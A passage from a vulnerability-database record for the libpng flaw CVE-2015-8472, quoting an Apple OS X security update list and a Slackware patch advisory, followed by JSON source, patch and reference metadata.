Driver\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription: An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription: Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Multiple vulnerabilities in LibreSSL\nDescription: Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a tel link can make a call without prompting the\nuser\nDescription: A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. This issue was addressed by updating to\nversion 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to check for the existence of\narbitrary files\nDescription: A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/libpng-1.4.18-x86_64-1_slack14.1.txz: Upgraded. \n Fixed incorrect implementation of png_set_PLTE() that uses png_ptr\n not info_ptr, that left png_set_PLTE() open to the CVE-2015-8126\n vulnerability. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8472\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/libpng-1.2.55-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/libpng-1.2.55-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/libpng-1.4.18-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/libpng-1.4.18-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/libpng-1.4.18-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/libpng-1.4.18-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libpng-1.4.18-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libpng-1.4.18-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libpng-1.4.18-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libpng-1.4.18-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpng-1.6.20-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpng-1.6.20-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n0ee9224ad5684fad22c1b0c90605c63b libpng-1.2.55-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nd9b29264e8312baf0c511c81ad779e59 libpng-1.2.55-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n28f6f162e3808d1dcdf6a3a98a8ccd69 libpng-1.4.18-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n156846c2db1a60cc840ed6e545ad9ec3 libpng-1.4.18-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n6c2eb1e0434a742f837b3d136d09fa89 libpng-1.4.18-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n099974c30fce3f57ba60249e6cd4ad99 libpng-1.4.18-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nb546c957f439e78bbee7bdd429953a76 libpng-1.4.18-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n66903cc8d9eea2c47698ff0776da13e2 libpng-1.4.18-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nf2dfcb4aa0a05fccf81f60f913bc7e8e libpng-1.4.18-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nc06efdbec225394a156860a4f571dd59 libpng-1.4.18-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n6f2e6e7f5f8c3760a372cc9ae3130060 l/libpng-1.6.20-i586-1.txz\n\nSlackware x86_64 -current package:\n8be8af75ec81e9463adf345c0bf48432 l/libpng-1.6.20-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg libpng-1.4.18-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address", "sources": [ { "db": "NVD", "id": "CVE-2015-8472" }, { "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "db": "VULHUB", "id": "VHN-86433" }, { "db": "VULMON", "id": "CVE-2015-8472" }, { "db": "PACKETSTORM", "id": "135555" }, { "db": "PACKETSTORM", "id": "135556" }, { "db": "PACKETSTORM", "id": "135557" }, { "db": "PACKETSTORM", "id": "135153" }, { "db": "PACKETSTORM", "id": "134719" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "135341" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "134874" } ], "trust": 2.61 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-86433", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-86433" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-8472", "trust": 3.5 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2015/12/03/6", "trust": 1.2 }, { "db": "MCAFEE", "id": "SB10148", "trust": 1.2 }, { "db": "BID", "id": "78624", "trust": 1.2 }, { "db": "JVN", "id": "JVNVU97668313", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006846", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201512-189", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "135153", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "134874", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "135265", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-86433", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-8472", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135555", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135556", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135557", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134719", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137932", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135341", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136346", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-86433" }, { "db": "VULMON", "id": "CVE-2015-8472" }, { "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "db": "PACKETSTORM", "id": "135555" }, { "db": "PACKETSTORM", "id": "135556" }, { "db": "PACKETSTORM", "id": "135557" }, { "db": "PACKETSTORM", "id": "135153" }, { "db": "PACKETSTORM", "id": "134719" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "135341" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "134874" }, { "db": "CNNVD", "id": "CNNVD-201512-189" }, { "db": "NVD", "id": "CVE-2015-8472" } ] }, "id": "VAR-201601-0495", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-86433" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:27:47.728000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206167" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206167" }, { "title": "Text Form of Oracle Critical Patch Update - January 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016verbose-2367956.html" }, { "title": "Oracle Critical Patch Update Advisory - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "title": "January 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/january_2016_critical_patch_update" }, { "title": "libpng10 / 1.0.65", "trust": 0.8, "url": "http://sourceforge.net/projects/libpng/files/libpng10/1.0.65/" }, { "title": "libpng12 / 1.2.55", "trust": 0.8, "url": "http://sourceforge.net/projects/libpng/files/libpng12/1.2.55/" }, { "title": "libpng14 / 1.4.18", "trust": 0.8, "url": "http://sourceforge.net/projects/libpng/files/libpng14/1.4.18/" }, { "title": "libpng15 / 1.5.25", "trust": 0.8, "url": "http://sourceforge.net/projects/libpng/files/libpng15/1.5.25/" }, { "title": "libpng16 / 1.6.20", "trust": 0.8, "url": "http://sourceforge.net/projects/libpng/files/libpng16/1.6.20/" }, { "title": "TLSA-2016-11", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-11j.html" }, { "title": "Oracle Corporation Java\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b", "trust": 0.8, "url": "http://www.fmworld.net/biz/common/oracle/20160120.html" }, { "title": "libpng Buffer Overflow Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=59039" }, { "title": "Red Hat: Moderate: libpng security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152596 - security advisory" }, { "title": "Red Hat: Moderate: libpng12 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152595 - security advisory" }, { "title": "Red Hat: Moderate: libpng security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152594 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: libpng: CVE-2015-8540: read underflow in libpng", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=0a130e26709c1ba00694161c08b9c604" }, { "title": "Ubuntu Security Notice: libpng vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2861-1" }, { "title": "Debian CVElist Bug Report Logs: libpng: Incomplete fix for CVE-2015-8126", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=386e683fecec564e81371b5dca873869" }, { "title": "Debian Security Advisories: DSA-3443-1 libpng -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=57e4bc5fc071e2986f7cef65414ffe23" }, { "title": "Red Hat: CVE-2015-8472", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-8472" }, { "title": "Amazon Linux AMI: ALAS-2015-615", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-615" }, { "title": "Apple: OS X El Capitan v10.11.4 and Security Update 2016-002", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=ef054ba76412200e34091eb91c38c281" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8" }, { "title": "IBM: Security Bulletin: Multiple vulnerabilities in IBM Java affect IBM Netezza Analytics for NPS", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c36fc403a4c2c6439b732d2fca738f58" }, { "title": "clair-lab", "trust": 0.1, "url": "https://github.com/sjourdan/clair-lab " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-8472" }, { "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "db": "CNNVD", "id": "CNNVD-201512-189" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-86433" }, { "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "db": "NVD", "id": "CVE-2015-8472" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.3, "url": "http://www.securityfocus.com/bid/78624" }, { "trust": 1.3, "url": "http://rhn.redhat.com/errata/rhsa-2015-2595.html" }, { "trust": 1.3, "url": "http://rhn.redhat.com/errata/rhsa-2016-0056.html" }, { "trust": 1.3, "url": "https://access.redhat.com/errata/rhsa-2016:1430" }, { "trust": 1.2, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "trust": 1.2, "url": "http://sourceforge.net/projects/libpng/files/libpng10/1.0.65/" }, { "trust": 1.2, "url": "http://sourceforge.net/projects/libpng/files/libpng12/1.2.55/" }, { "trust": 1.2, "url": "http://sourceforge.net/projects/libpng/files/libpng14/1.4.18/" }, { "trust": 1.2, "url": "http://sourceforge.net/projects/libpng/files/libpng15/1.5.25/" }, { "trust": 1.2, "url": "http://sourceforge.net/projects/libpng/files/libpng16/1.6.20/" }, { "trust": 1.2, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "trust": 1.2, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 1.2, "url": "https://support.apple.com/ht206167" }, { "trust": 1.2, "url": "http://www.debian.org/security/2016/dsa-3443" }, { "trust": 1.2, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/174936.html" }, { "trust": 1.2, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/175073.html" }, { "trust": 1.2, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/174905.html" }, { "trust": 1.2, "url": "http://www.openwall.com/lists/oss-security/2015/12/03/6" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-2594.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-2596.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-0055.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-0057.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00038.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00042.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00044.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00041.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00043.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00045.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00047.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00048.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10148" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8472" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472" }, { "trust": 0.8, "url": "https://www.ipa.go.jp/security/ciadr/vul/20160120-jre.html" }, { "trust": 0.8, "url": "http://www.jpcert.or.jp/at/2016/at160005.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97668313" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-8472" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126" }, { "trust": 0.6, "url": "https://access.redhat.com/security/cve/cve-2015-8126" }, { "trust": 0.6, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.6, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.6, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.6, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.6, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.6, "url": "https://access.redhat.com/security/cve/cve-2015-8472" }, 